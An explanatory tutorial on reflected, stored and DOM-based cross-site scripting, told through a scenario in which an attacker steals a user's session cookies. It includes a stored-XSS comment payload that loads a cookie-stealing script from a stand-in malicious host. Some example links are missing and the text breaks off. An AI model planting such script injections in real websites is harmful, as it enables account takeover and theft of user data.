Cross-Site Scripting is a computer security vulnerability in web applications using which an attacker can exploit a victim and inject client side scripts into web pages viewed by the victim to do malicious activities like steal sensitive information etc.
There are three types of Cross-Site Scripting Attacks :
- Reflected or Non-persistent Cross-Site Scripting Attack or Reflected XSS
- Persistent or Stored Cross-Site Scripting Attack or Stored XSS
- DOM Based Cross-Site Scripting Attack or DOM Based XSS
Let's discuss each type of attack with a simple example to understand it better.
Suppose, there is a web application vulnarable.com which has XSS vulnerability. Adam is a registered user there. And Bob is an attacker who is aware of the vulnerability.
Also assume that, in vulnerable.com there is a search bar. If anyone searches with a keyword, related results appear in the page. Or it says “Not Found” if no matching entry is available.
Bob has written a script steal_auth.js. If a registered user executes that script then his authentication information stored in cookies in transferred to Bob.
So, Bob keeps this script in malicious.com/steal_auth.js and sends a link of that to Adam. Bob may use social engineering to trick Bob to click on that link, for example Bob may send that link to Adam in an email attachment and say, look at some interesting pictures! which may eventually point to
Bob may even convert the ASCII characters to hexadecimal so that the link is not human readable.
Now, suppose Adam clicks on the link when he is already authenticated to the website vulnerable.com. And when he does so, his authentication information will get transferred to Bob silently, though Adam will see a benign message in the search results “Not Found”.
With this sensitive authentication information of Adam, Bob can impersonate Adam and login to his account. If Adam has other sensitive information like Credit Card number etc stored in his account, Bob can do much mischiefs. Bob can even change Adam's password, so that Adam's account is no longer accessible to Adam.
This type of attacks are Reflective XSS.
Persistent or Stored XSS
Now, let's suppose, in the previous example, there is a section for posting comments. And whatever comments are posted are stored in database as it is.
Now, Bob makes a malicious comments in this section :
I love the site.<script src=”http://malicious.com/steal_auth.js”>
If the comment is stored in the database as it is, when any registered user will go to the section and load the webpage, the script steal_auth.js will be executed.
As a result, the user's authentication information will silently get transferred to Bob. And we know now, after that what can happen. This is a simple example of Persistent or Stored XSS.
DOM Based XSS
In DOM Based XSS, the attacker embedds the malicious attacker data in the client side, from within a page served from the web server.
For example, suppose a link of the web application vulnerable.com is
Now, Bob tricks Adam to click on a link :